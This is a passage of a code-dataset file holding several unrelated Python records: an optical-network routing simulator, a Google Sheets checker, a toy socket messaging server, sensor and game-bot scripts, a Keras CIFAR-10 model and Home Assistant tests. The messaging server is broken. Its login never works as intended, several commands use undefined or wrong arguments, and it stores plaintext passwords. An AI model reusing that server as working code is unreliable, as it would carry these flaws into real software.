--ridefinita in Lab4 sotto\n # def find_best_latency(self, input_node, output_node):\n # all_paths = self.weighted_paths.path.values\n # inout_paths = [path for path in all_paths if ((path[0] == input_node) and (path[-1] == output_node))]\n # inout_df = self.weighted_paths.loc[\n # self.weighted_paths.path.isin(inout_paths)]\n # best_latency = np.min(inout_df.latency.values)\n # best_path = inout_df.loc[\n # inout_df.latency == best_latency].path.values[0].replace('->', '')\n # return best_path\n\n def stream(self, connections, best='latency'): # Aggiornato a Lab7\n streamed_connections = []\n for connection in connections:\n input_node = connection.input_node\n output_node = connection.output_node\n signal_power = connection.signal_power\n # self.set_weighted_paths(signal_power) Lab3\n self.set_weighted_paths(1) # Lab4\n if best == 'latency':\n path = self.find_best_latency(input_node, output_node)\n elif best == 'snr':\n path = self.find_best_snr(input_node, output_node)\n else:\n print('ERROR: best input not recognized.Value:', best)\n continue\n # if path: #added condition for Lab4 on the path\n # in_signal_information = SignalInformation(signal_power, path)\n # out_signal_information = self.propagate(in_signal_information)\n # connection.latency = out_signal_information.latency\n # noise = out_signal_information.noise_power\n # connection.snr = 10 * np.log10(signal_power / noise)\n if path: # Condiione aggiornata a Lab5\n path_occupancy = self.route_space.loc[self.route_space.path == path].T.values[1:]\n channel = [i for i in range(len(path_occupancy)) if path_occupancy[i] == 'free'][0]\n # Lab 7 es 3\n lightpath = Lightpath(signal_power, path, channel)\n rb = self.calculate_bit_rate(lightpath, self.nodes[input_node].transceiver)\n if rb == 0:\n continue\n else:\n connection.bit_rate = rb\n # end\n path_occupancy = self.route_space.loc[\n self.route_space.path == path].T.values[1:]\n channel = [i for i in range(len(path_occupancy))\n if path_occupancy[i] == 'free'][0]\n path = path.replace('->', '')\n in_lightpath = Lightpath(signal_power, path, channel)\n out_lightpath = self.propagate(in_lightpath, True)\n connection.latency = out_lightpath.latency\n noise_power = out_lightpath.noise_power\n connection.snr = 10 * np.log10(signal_power / noise_power)\n self.update_route_space(path, channel)\n else:\n connection.snr = 0\n connection.latency = 'None'\n streamed_connections.append(connection)\n return streamed_connections\n\n # due metodi aggiunti (lab5)\n @staticmethod\n def path_to_line_set(path):\n path = path.replace('->', '')\n return set([path[i] + path[i + 1] for i in range(len(path) - 1)])\n\n def update_route_space(self, path,\n channel): # Modifica da Lab6 per aggiornare la routing space con la switching matrix\n all_paths = [self.path_to_line_set(p) for p in self.route_space.path.values]\n states = self.route_space[str(channel)]\n lines = self.path_to_line_set(path)\n for i in range(len(all_paths)):\n line_set = all_paths[i]\n if lines.intersection(line_set):\n states[i] = 'occupied'\n\n path_to_update = self.line_set_to_path(line_set)\n\n for j in range(len(path_to_update)): # strange\n if j not in (0, len(path_to_update) - 1):\n if ((path_to_update[j - 1] in self.nodes[path_to_update[j]].connected_nodes) & (\n path_to_update[j + 1] in self.nodes[path_to_update[j]].connected_nodes)):\n self.nodes[path_to_update[j]].switching_matrix[path_to_update[j - 1]][\n path_to_update[j + 1]][\n channel] = 0\n self.route_space[str(channel)] = states\n\n # metodo per ottenere tutte le 
liste di stati dalle linee\n @staticmethod # how tf is this working i've really have no idea\n def line_set_to_path(line_set):\n path = \"\"\n elements = list(itertools.permutations(list(line_set), len(list(line_set))))\n for i in range(len(elements)):\n flag = 1\n for j in range(len(elements[i]) - 1):\n if elements[i][j][1] != elements[i][j + 1][0]:\n flag = 0\n j += 2\n if flag == 1:\n for j in range(len(elements[i])):\n path += elements[i][j][0]\n return path\n\n # es7 Lab4\n # Modifica Lab5 es4 in modo da gestire la channel occupancy (tutti e tre i metodi)\n\n # def available_paths(self, input_node, output_node): #Funzione da Lab4\n # if self.weighted_paths is None:\n # self.set_weighted_paths(1)\n # all_paths = [path for path in self.weighted_paths.path.values\n # if ((path[0] == input_node) and (path[-1] == output_node))]\n # unavailable_lines = [line for line in self.lines\n # if self.lines[line].state =='occupied']\n # available_paths = []\n # for path in all_paths:\n # available = True\n # for line in unavailable_lines:\n # if line[0] + '->' + line[1] in path:\n # available = False\n # break\n # if available:\n # available_paths.append(path)\n # return available_paths\n\n def available_paths(self, input_node, output_node): # Funione ridefinita in contesto a Lab5\n if self.weighted_paths is None:\n self.set_weighted_paths(1e-3)\n all_paths = [path for path in self.weighted_paths.path.values\n if ((path[0] == input_node) and (path[-1] == output_node))]\n available_paths = []\n for path in all_paths:\n path_occupancy = self.route_space.loc[self.route_space.path == path].T.values[1:]\n if 'free' in path_occupancy:\n available_paths.append(path)\n return available_paths\n\n def find_best_snr(self, input_node, output_node):\n available_paths = self.available_paths(input_node, output_node)\n if available_paths:\n inout_df = self.weighted_paths.loc[self.weighted_paths.path.isin(available_paths)]\n best_snr = np.max(inout_df.snr.values)\n # best_path = inout_df.loc[inout_df.snr == best_snr].path.values[0].replace('->', '')\n best_path = inout_df.loc[inout_df.snr == best_snr].path.values[0] # da Lab5\n else:\n best_path = None\n return best_path\n\n def find_best_latency(self, input_node, output_node):\n available_paths = self.available_paths(input_node, output_node)\n if available_paths:\n inout_df = self.weighted_paths.loc[self.weighted_paths.path.isin(available_paths)]\n best_latency = np.min(inout_df.latency.values)\n # best_path = inout_df.loc[inout_df.latency == best_latency].path.values[0].replace('->', '')\n best_path = inout_df.loc[inout_df.latency == best_latency].path.values[0] # da Lab5\n else:\n best_path = None\n return best_path\n\n # Lab5\n @property\n def route_space(self):\n return self._route_space\n\n # Lab7\n def calculate_bit_rate(self, lightpath, strategy):\n global BER_t\n Rs = lightpath.Rs\n global Bn\n path = lightpath.path\n Rb = 0\n GSNR_db = pd.array(self.weighted_paths.loc[self.weighted_paths['path'] == path]['snr'])[0]\n GSNR = 10 ** (GSNR_db / 10)\n\n if strategy == 'fixed_rate':\n if GSNR > 2 * math.erfcinv(2 * BER_t) ** 2 * (Rs / Bn):\n Rb = 100\n else:\n Rb = 0\n\n if strategy == 'flex_rate':\n if GSNR < 2 * math.erfcinv(2 * BER_t) ** 2 * (Rs / Bn):\n Rb = 0\n elif (GSNR > 2 * math.erfcinv(2 * BER_t) ** 2 * (Rs / Bn)) & (GSNR < (14 / 3) * math.erfcinv(\n (3 / 2) * BER_t) ** 2 * (Rs / Bn)):\n Rb = 100\n elif (GSNR > (14 / 3) * math.erfcinv((3 / 2) * BER_t) ** 2 * (Rs / Bn)) & (GSNR < 10 * math.erfcinv(\n (8 / 3) * BER_t) ** 2 * (Rs / Bn)):\n Rb = 200\n elif 
GSNR > 10 * math.erfcinv((8 / 3) * BER_t) ** 2 * (Rs / Bn):\n Rb = 400\n\n if strategy == 'shannon':\n Rb = 2 * Rs * np.log2(1 + Bn / Rs * GSNR) / 1e9\n\n return Rb\n\n # Lab9: added functions to update the traffic matrix\n\n def node_to_number(self, str):\n nodes = list(self.nodes.keys())\n nodes.sort()\n return nodes.index(str)\n\n def upgrade_traffic_matrix(self, mtx, nodeA, nodeB):\n A = self.node_to_number(nodeA)\n B = self.node_to_number(nodeB)\n connection = Connection(nodeA, nodeB, 1e-3)\n list_con = [connection]\n self.stream(list_con)\n btr = connection.bit_rate\n if btr == 0:\n mtx[A][B] = float('inf')\n return float('inf')\n mtx[A][B] -= btr\n return mtx[A][B]\n\n\n############################# CLASS CONNECTIONS ######################################\n\nclass Connection(object):\n def __init__(self, input_node, output_node, signal_power):\n self._input_node = input_node\n self._output_node = output_node\n self._signal_power = signal_power\n self._latency = 0\n self._snr = 0\n self._bit_rate = 0\n\n @property\n def input_node(self):\n return self._input_node\n\n @property\n def output_node(self):\n return self._output_node\n\n @property\n def signal_power(self):\n return self._signal_power\n\n @property\n def latency(self):\n return self._latency\n\n @latency.setter\n def latency(self, latency):\n self._latency = latency\n\n @property\n def snr(self):\n return self._snr\n\n @snr.setter\n def snr(self, snr):\n self._snr = snr\n\n @property\n def bit_rate(self):\n return self._bit_rate\n\n @bit_rate.setter\n def bit_rate(self, bit_rate):\n self._bit_rate = bit_rate\n","sub_path":"core/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":26685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"416627340","text":"#!/usr/bin/env python\nimport httplib2\nimport os\nimport glob\nimport string\nimport time\nimport pprint\n\nfrom apiclient import discovery\nfrom oauth2client import client\nfrom oauth2client import tools\nfrom oauth2client.file import Storage\n\nimport xml.etree.ElementTree as ET\n\n# If modifying these scopes, delete your previously saved credentials\n# at ~/.credentials/sheets.googleapis.com-python-quickstart.json\nSCOPES = 'https://www.googleapis.com/auth/spreadsheets.readonly'\nCLIENT_SECRET_FILE = 'client_secret.json'\nAPPLICATION_NAME = 'Google Sheets API Python Quickstart'\n\nSPREADSHEET_ID = '1bV12DZtE0LfVpokKdsy9pu-zFLusoSH27Qoe6IqEVUU'\n\nSKIP_CONTRACTS = [\n 'BKK_BY_HZV',\n 'EK_BLN_HZV',\n 'EK_BW_HZV',\n 'EK_RLP_HZV',\n 'IKK_CL_BW_HZV',\n 'IKK_WL_HZV',\n 'LKK_BW_HZV',\n 'LKK_BY_HZV',\n 'LKK_WL_HZV',\n 'RV_KBS_BW_HZV',\n 'AOK_HE_HZV',\n\n 'AOK_BY_HZV_S12',\n 'AOK_BY_HZV_S15',\n 'EK_BY_HZV_S12',\n\n 'SK_FA_IV_RH',\n 'SK_HA_IV_RH',\n 'GWQ_HA_BV_TA',\n 'SK_FA_BV_CD',\n 'SK_HA_BV_CD',\n 'TK_HA_BV_TA',\n\n 'VAG_FA_GASTRO_BW',\n 'VAG_FA_KARDIO_BW',\n 'AOK_FA_GASTRO_BW',\n 'AOK_FA_KARDIO_BW',\n 'AOK_FA_NPPP_BW',\n 'AOK_FA_OC_BW',\n 'AOK_FA_URO_BW',\n 'BKK_FA_GASTRO_BW',\n 'BKK_FA_KARDIO_BW',\n 'BKK_FA_OC_BW',\n 'BKK_FA_URO_BW',\n 'BKK_BOSCH_FA_BW',\n\n 'BKK_VAG_BW',\n 'BKK_BOSCH_BW',\n\n 'AOK_MV_KV',\n 'BA_MV_KV',\n ]\n\n\ndef get_credentials():\n \"\"\"Gets valid user credentials from storage.\n\n If nothing has been stored, or if the stored credentials are invalid,\n the OAuth2 flow is completed to obtain the new credentials.\n\n Returns:\n Credentials, the obtained credential.\n \"\"\"\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not 
os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir, 'sheets.googleapis.com-python-quickstart.json')\n\n store = Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n credentials = tools.run_flow(flow, store, None)\n print('Storing credentials to ' + credential_path)\n return credentials\n\ndef main():\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'\n 'version=v4')\n service = discovery.build('sheets', 'v4', http=http,\n discoveryServiceUrl=discoveryUrl)\n\n for contract_filename in glob.glob('*xml'):\n short_name, _ = contract_filename.split('_VSW_')\n if short_name in SKIP_CONTRACTS: continue\n print('Checking', short_name, '...', end=' ')\n requirements = get_requirements_from_xml(contract_filename)\n\n (progress, gsheet_contract) = get_requirements_from_gsheet(short_name, service)\n # remove Obsolete requirements\n cleaned = [c for c in gsheet_contract if progress[c] != 'Obsolete']\n compare(requirements, set(cleaned))\n time.sleep(2)\n\n print()\n print(len(SKIP_CONTRACTS), \"contracts not yet added\")\n\ndef compare(xml_requirements, gsheet_contract):\n # Check for things we need to ADD to the spreadsheet\n add = xml_requirements - gsheet_contract\n if add: print('\\t', 'ADD', sorted(add))\n\n remove = gsheet_contract - xml_requirements\n if remove: print('\\t','REMOVE', remove)\n\ndef get_current_progress(sheet):\n result = sheet.batchGet(spreadsheetId=SPREADSHEET_ID,\n ranges=['By Req!A4:A', 'By Req!B4:B']).execute()\n\n status = [x[0] for x in result['valueRanges'][0]['values']]\n function = [x[0] for x in result['valueRanges'][1]['values']]\n\n state = {}\n state.update(zip(function, status))\n\n return state\n\ndef get_column(short_name, sheet):\n SKIP_COLUMNS = ['Necessity', 'Title', 'Bing / Google Translated', 'Original', 'Characteristic', 'Remark']\n result = sheet.get(spreadsheetId=SPREADSHEET_ID, range='By Req!C3:ZZ3').execute()\n contracts = filter(lambda x: x not in SKIP_COLUMNS, result['values'][0])\n contracts = list(contracts)\n column_number = contracts.index(short_name)\n column_number += 2 # we did the query from C column so we need to adjust back\n\n wrap = column_number // 26\n final = string.ascii_uppercase[column_number % 26]\n if wrap > 0:\n column = string.ascii_uppercase[wrap - 1] + final\n else:\n column = final\n print('[', 'Column', column, ']')\n\n return column\n\ndef get_single_contract(column, sheet):\n range = 'By Req!%s4:%s' % (column, column)\n result = sheet.batchGet(spreadsheetId=SPREADSHEET_ID, ranges=['By Req!B4:B', range]).execute()\n function = [x[0] for x in result['valueRanges'][0]['values']]\n completed = [x != [] for x in result['valueRanges'][1]['values']]\n\n state = {}\n state.update(zip(function, completed))\n\n return set([k for k in state.keys() if state[k]]) \n\ndef get_requirements_from_gsheet(short_name, service):\n sheet = service.spreadsheets().values()\n progress = get_current_progress(sheet)\n column = get_column(short_name, sheet)\n contract = get_single_contract(column, sheet)\n return (progress, contract)\n\ndef get_requirements_from_xml(xml):\n tree = ET.parse(xml)\n root = tree.getroot()\n contracts = root.findall('.//funktionVertragssoftwareRef')\n return(set([c.attrib['ID'] for c in contracts]))\n\nif __name__ == 
'__main__':\n main()\n","sub_path":"contract_check.py","file_name":"contract_check.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"131694444","text":"#\r\n# https://pymotw.com/2/socket/tcp.html\r\n# https://docs.python.org/3/howto/sockets.html\r\n# Messaging Server v0.1.0\r\nimport socket\r\nimport sys\r\n\r\n# CONTRACT\r\n# start_server : string number -> socket\r\n# Takes a hostname and port number, and returns a socket\r\n# that is ready to listen for requests\r\ndef start_server (host, port):\r\n server_address = (host, port)\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.bind(server_address)\r\n sock.listen(1)\r\n return sock\r\n\r\n# CONTRACT\r\n# get_message : socket -> string\r\n# Takes a socket and loops until it receives a complete message\r\n# from a client. Returns the string we were sent.\r\n# No error handling whatsoever.\r\ndef get_message (sock):\r\n chars = []\r\n connection, client_address = sock.accept()\r\n print (\"Connection from [{0}]\".format(client_address))\r\n try:\r\n while True:\r\n char = connection.recv(1)\r\n if char == b'\\0':\r\n break\r\n if char == b'':\r\n break\r\n else:\r\n\t # print(\"Appending {0}\".format(char))\r\n chars.append(char.decode(\"utf-8\") )\r\n finally:\r\n return (''.join(chars), connection)\r\n\r\n# CONTRACT\r\n# socket -> boolean\r\n# Shuts down the socket we're listening on.\r\ndef stop_server (sock):\r\n return sock.close()\r\n\r\n# DATA STRUCTURES\r\n# The structures for your server should be defined and documented here.\r\n\r\n# SERVER IMPLEMENTATION\r\n# The implementation of your server should go here.\r\nUD = {} #UserData {:[,]}\r\nMBX = {} #Mailbox {:}\r\nIMQ = [] #Messages []\r\n\r\ndef is_login(UD, username):\r\n user = UD[username]\r\n loginstatus = user[1]\r\n return loginstatus\r\n \r\n# CONTRACT\r\ndef handle_message (msg):\r\n if \"LOGIN\" in msg:\r\n # Username\r\n username = msg.split(\" \")[1]\r\n # Password\r\n password = msg.split(\" \")[2]\r\n # IF the user is register status equals None?\r\n if UD.get(username) == None:\r\n return(\"ERROR\",\"User does not exsited\")\r\n # ELIF the user is equal to the givin password\r\n elif UD[username][1] != password:\r\n return(\"ERROR\",\"Password invald\")\r\n # ELSE login \r\n else:\r\n login_status = is_login(UD[username], username)\r\n login_status = True\r\n return(\"LOGIN\", \"{0} Login\".format(username))\r\n\t \r\n elif \"DUMP\" in msg:\r\n # Get the username\r\n #username = msg.split(\" \")[1]\r\n # Checking user status\r\n #if is_login(UD[username]) == True:\r\n print(MBX)\r\n print(IMQ)\r\n return (\"OK\", \"Dumped.\")\r\n #else:\r\n # return (\"Error\", \"Current user is not login\")\r\n\t \r\n elif \"REGISTER\" in msg:\r\n # Get the username\r\n username = msg.split(\" \")[1]\r\n # Get the password\r\n password = msg.split(\" \")[2]\r\n # Create an empty list of messages\r\n UD[username] = [password,False]\r\n MBX[username] = []\r\n return (\"OK\", \"Registered. 
{0}/n {1}/n {2}\".format(UD,MBX,IMQ))\r\n \r\n elif \"MESSAGE\" in msg:\r\n # Get the username\r\n username = msg.split(\" \")[1]\r\n print(\"Username: {0}\".format(username))\r\n if is_login(UD[username], username) == True:\r\n # Get the content; slice everything after\r\n # the word MESSAGE\r\n content = msg.split(\" \")[2:]\r\n # Put the content back together, and put \r\n # it on the incoming message queue.\r\n IMQ.insert(0, \" \".join(content))\r\n return (\"OK\", \"Sent message.\")\r\n else:\r\n return (\"Error\", \"Current user is not login\")\r\n \r\n elif \"STORE\" in msg:\r\n # Get the username\r\n #username = msg.split(\" \")[1]\r\n #if is_login(UD[username]) == True:\r\n queued = IMQ.pop()\r\n print(\"Message in queue:\\n---\\n{0}\\n---\\n\".format(queued))\r\n MBX[username].insert(0, queued)\r\n return (\"OK\", \"Stored message.\")\r\n #else:\r\n # return (\"Error\", \"Current user is not login\")\r\n \r\n elif \"COUNT\" in msg:\r\n # Get the username\r\n username = msg.split(\" \")[1]\r\n if is_login(UD[username], username) == True:\r\n return (\"SEND\", \"COUNTED {0}\".format(len(MBX[username])))\r\n else:\r\n return (\"Error\", \"Current user is not login\")\r\n elif \"DELMSG\" in msg:\r\n # Get the username\r\n username = msg.split(\" \")[1]\r\n if is_login(UD[username]) == True:\r\n MBX[username].pop(0)\r\n return (\"OK\", \"Message deleted.\")\r\n else:\r\n return (\"Error\", \"Current user is not login\")\r\n\t \r\n elif \"GETMSG\" in msg:\r\n # Get the username\r\n username = msg.split(\" \")[1]\r\n if is_login(UD[username], username) == True:\r\n first = MBX[username][0]\r\n print (\"First message:\\n---\\n{0}\\n---\\n\".format(first) )\r\n return (\"SEND\", first)\r\n else:\r\n return (\"Error\", \"Current user is not login\")\r\n else:\r\n print(\"NO HANDLER FOR CLIENT MESSAGE: [{0}]\".format(msg))\r\n return (\"KO\", \"No handler found for client message.\")\r\n\r\nif __name__ == \"__main__\":\r\n # Check if the user provided all of the \r\n # arguments. The script name counts\r\n # as one of the elements, so we need at \r\n # least three, not fewer.\r\n \"\"\"\r\n if len(sys.argv) < 3:\r\n print (\"Usage: \")\r\n print (\" python server.py \")\r\n print (\" e.g. 
python server.py localhost 8888\")\r\n print\r\n sys.exit()\r\n \"\"\"\r\n #host = sys.argv[1]\r\n host = \"Localhost\"\r\n #port = int(sys.argv[2])\r\n port = 8888\r\n sock = start_server(host, port)\r\n print(\"Running server on host [{0}] and port [{1}]\".format(host, port))\r\n \r\n RUNNING = True\r\n while RUNNING:\r\n message, conn = get_message(sock)\r\n print(\"MESSAGE: [{0}]\".format(message))\r\n result, msg = handle_message(message)\r\n print (\"Result: {0}\\nMessage: {1}\\n\".format(result, msg))\r\n if result == \"ERROR\":\r\n conn.sendall(bytes(\"{0}\\0\".format(result)))\r\n elif result == \"LOGIN\":\r\n conn.sendall(bytes(\"{0}\\0\".format(result)))\r\n elif result == \"OK\":\r\n conn.sendall(bytes(\"{0}\\0\".format(result)))\r\n elif result == \"SEND\":\r\n conn.sendall(bytes(\"{0}\\0\".format(msg)))\r\n else:\r\n print(\"'else' reached.\")\r\n RUNNING = False\r\n conn.close()\r\n\r\nstop_server(sock)\r\n","sub_path":"Examples/Networking/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"440835345","text":"#!/usr/bin/env python\n\nimport logging\n\nlogger = logging.getLogger('arbitrage')\nlogger.setLevel(logging.DEBUG)\nfh = logging.FileHandler('history_arbitrage.log')\nformatter = logging.Formatter('%(asctime)s - %(message)s')\nfh.setFormatter(formatter)\nlogger.addHandler(fh)\n\n\n#livequote = False\nlivequote = True #This gets the quotes online everytime. Time consuming.\n\n","sub_path":"projectconfig.py","file_name":"projectconfig.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"461398470","text":"from multiprocessing import Process\nfrom Bluetin_Echo import Echo\nimport RPi.GPIO as GPIO\nimport time\nGPIO.setmode(GPIO.BCM) #Käytetään BCM-mäppäystä pinnien hallintaan\nTRIGGER_PIN = 23 #Liipasimen BCM-pinni on 23\nECHO_PIN = 24 #Äänen kaiun BCM-pinni on 24\nGPIO.setwarnings(False)\ndef distanceMeasure():\n while True:\n speed_of_sound = 340\n echo = Echo(TRIGGER_PIN, ECHO_PIN, speed_of_sound) #Echo-mittauksen asetus\n samples = 10 #Montako mittausta otetaan keskiarvolaskentaan\n result = echo.read('cm', samples) # Hae etäisyysmittausten keskiarvo cm:einä\n print(result, 'cm') # Tuloksen tulostaminen\n # GPIO cleanup\n echo.stop()\n\ndef main():\n p1 = Process(target=distanceMeasure, args=())\n p1.start()\n #p1.join()\n print('pääohjelma suoritettu')\n\nif __name__ == '__main__':\n main()","sub_path":"PointCollegeSensorControl/Python/EtaisyysMittausBluetin.py","file_name":"EtaisyysMittausBluetin.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"71735780","text":"\"\"\"Upgrading zergling speed\"\"\"\nfrom sc2.constants import RESEARCH_ZERGLINGMETABOLICBOOST, ZERGLINGMOVEMENTSPEED\n\n\nclass UpgradeMetabolicBoost:\n \"\"\"Ok for now\"\"\"\n\n def __init__(self, ai):\n self.ai = ai\n\n async def should_handle(self, iteration):\n \"\"\"Requirements to run handle\"\"\"\n local_controller = self.ai\n if not local_controller.pools.ready.idle:\n return False\n\n return not local_controller.already_pending_upgrade(ZERGLINGMOVEMENTSPEED) and local_controller.can_afford(\n RESEARCH_ZERGLINGMETABOLICBOOST\n )\n\n async def handle(self, iteration):\n \"\"\"Execute the action of upgrading zergling speed\"\"\"\n local_controller = self.ai\n pool = 
local_controller.pools.ready\n local_controller.add_action(pool.first(RESEARCH_ZERGLINGMETABOLICBOOST))\n return True\n","sub_path":"actions/upgrades/metabolicboost.py","file_name":"metabolicboost.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"180103715","text":"\n\nfrom xai.brain.wordbase.nouns._bust import _BUST\n\n#calss header\nclass _BUSTING(_BUST, ):\n\tdef __init__(self,): \n\t\t_BUST.__init__(self)\n\t\tself.name = \"BUSTING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"bust\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_busting.py","file_name":"_busting.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"252608245","text":"# Simple CNN model for CIFAR-10\nimport numpy\nfrom keras.datasets import cifar10\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import Flatten\nfrom keras.constraints import maxnorm\nfrom keras.optimizers import SGD\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.convolutional import MaxPooling2D\nfrom keras.models import load_model\nimport matplotlib.pyplot as plt\nfrom keras.utils import np_utils\nfrom keras import backend as K\nK.image_data_format()\n\n# fix random seed for reproducibility\nseed = 7\nnumpy.random.seed(seed)\n# load data\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\n# normalize inputs from 0-255 to 0.0-1.0\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train = X_train / 255.0\nX_test = X_test / 255.0\n# one hot encode outputs\ny_train = np_utils.to_categorical(y_train)\ny_test = np_utils.to_categorical(y_test)\nnum_classes = y_test.shape[1]\n# Create the model\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=(32, 32, 3), padding='same', activation='relu', kernel_constraint=maxnorm(3)))\nmodel.add(Dropout(0.2))\nmodel.add(Conv2D(32, (3, 3), activation='relu', padding='same', kernel_constraint=maxnorm(3)))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(64, (3, 3), activation='relu', padding='same', kernel_constraint=maxnorm(3)))\nmodel.add(Dropout(0.2))\nmodel.add(Conv2D(64, (3, 3), activation='relu', padding='same', kernel_constraint=maxnorm(3)))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(128, (3, 3), activation='relu', padding='same', kernel_constraint=maxnorm(3)))\nmodel.add(Dropout(0.2))\nmodel.add(Conv2D(128, (3, 3), activation='relu', padding='same', kernel_constraint=maxnorm(3)))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n#Flatten layer\nmodel.add(Flatten())\nmodel.add(Dropout(0.2))\nmodel.add(Dense(1024, activation='relu', kernel_constraint=maxnorm(3)))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(512, activation='relu', kernel_constraint=maxnorm(3)))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(num_classes, activation='softmax'))\n# Compile model\nepochs = 25\nlrate = 0.01\ndecay = lrate/epochs\nsgd = SGD(lr=lrate, momentum=0.9, decay=decay, nesterov=False)\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\nprint(model.summary())\n\n# Fit the model\nhistory = model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=epochs, batch_size=32)\n\nmodel.save('cifar10.h5')\nmodel = load_model('cifar10.h5')\n\n# Final evaluation of the model\nscores = model.evaluate(X_test, y_test, 
verbose=0)\nprint(\"Accuracy: %.2f%%\" % (scores[1]*100))\n\n\n# Predicting the first four images of dataset\nimage=model.predict_classes(X_train[[1],:])\nprint(image[0])\n\npredicted_image=y_test\nfor i in range(2,6):\n plt.imshow(X_test[i,:,:])\n plt.show()\n image=model.predict_classes(X_test[[i],:])\n print(\"actual\",predicted_image[i],\"predicted\",image[0])\n\n# Plotting the accuracy using history object\nplt.plot(history.history['accuracy'])\nplt.plot(history.history['val_accuracy'])\nplt.title('Model Accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n# Plotting the Loss using history object\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('Model Loss')\nplt.ylabel('Loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()","sub_path":"ICP4DL/SourceCode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"378093919","text":"\"\"\"Test the bootstrapping.\"\"\"\n# pylint: disable=protected-access\nimport asyncio\nimport os\nfrom unittest.mock import Mock, patch\nimport logging\n\nimport homeassistant.config as config_util\nfrom homeassistant import bootstrap\nimport homeassistant.util.dt as dt_util\n\nfrom tests.common import (\n patch_yaml_files, get_test_config_dir, mock_coro, mock_integration,\n MockModule)\n\nORIG_TIMEZONE = dt_util.DEFAULT_TIME_ZONE\nVERSION_PATH = os.path.join(get_test_config_dir(), config_util.VERSION_FILE)\n\n_LOGGER = logging.getLogger(__name__)\n\n\n# prevent .HA_VERSION file from being written\n@patch(\n 'homeassistant.bootstrap.conf_util.process_ha_config_upgrade', Mock())\n@patch('homeassistant.util.location.async_detect_location_info',\n Mock(return_value=mock_coro(None)))\n@patch('os.path.isfile', Mock(return_value=True))\n@patch('os.access', Mock(return_value=True))\n@patch('homeassistant.bootstrap.async_enable_logging',\n Mock(return_value=True))\ndef test_from_config_file(hass):\n \"\"\"Test with configuration file.\"\"\"\n components = set(['browser', 'conversation', 'script'])\n files = {\n 'config.yaml': ''.join('{}:\\n'.format(comp) for comp in components)\n }\n\n with patch_yaml_files(files, True):\n yield from bootstrap.async_from_config_file('config.yaml', hass)\n\n assert components == hass.config.components\n\n\n@patch('homeassistant.bootstrap.async_enable_logging', Mock())\n@asyncio.coroutine\ndef test_home_assistant_core_config_validation(hass):\n \"\"\"Test if we pass in wrong information for HA conf.\"\"\"\n # Extensive HA conf validation testing is done\n result = yield from bootstrap.async_from_config_dict({\n 'homeassistant': {\n 'latitude': 'some string'\n }\n }, hass)\n assert result is None\n\n\nasync def test_async_from_config_file_not_mount_deps_folder(loop):\n \"\"\"Test that we not mount the deps folder inside async_from_config_file.\"\"\"\n hass = Mock(\n async_add_executor_job=Mock(side_effect=lambda *args: mock_coro()))\n\n with patch('homeassistant.bootstrap.is_virtual_env', return_value=False), \\\n patch('homeassistant.bootstrap.async_enable_logging',\n return_value=mock_coro()), \\\n patch('homeassistant.bootstrap.async_mount_local_lib_path',\n return_value=mock_coro()) as mock_mount, \\\n patch('homeassistant.bootstrap.async_from_config_dict',\n return_value=mock_coro()):\n\n await bootstrap.async_from_config_file('mock-path', hass)\n assert 
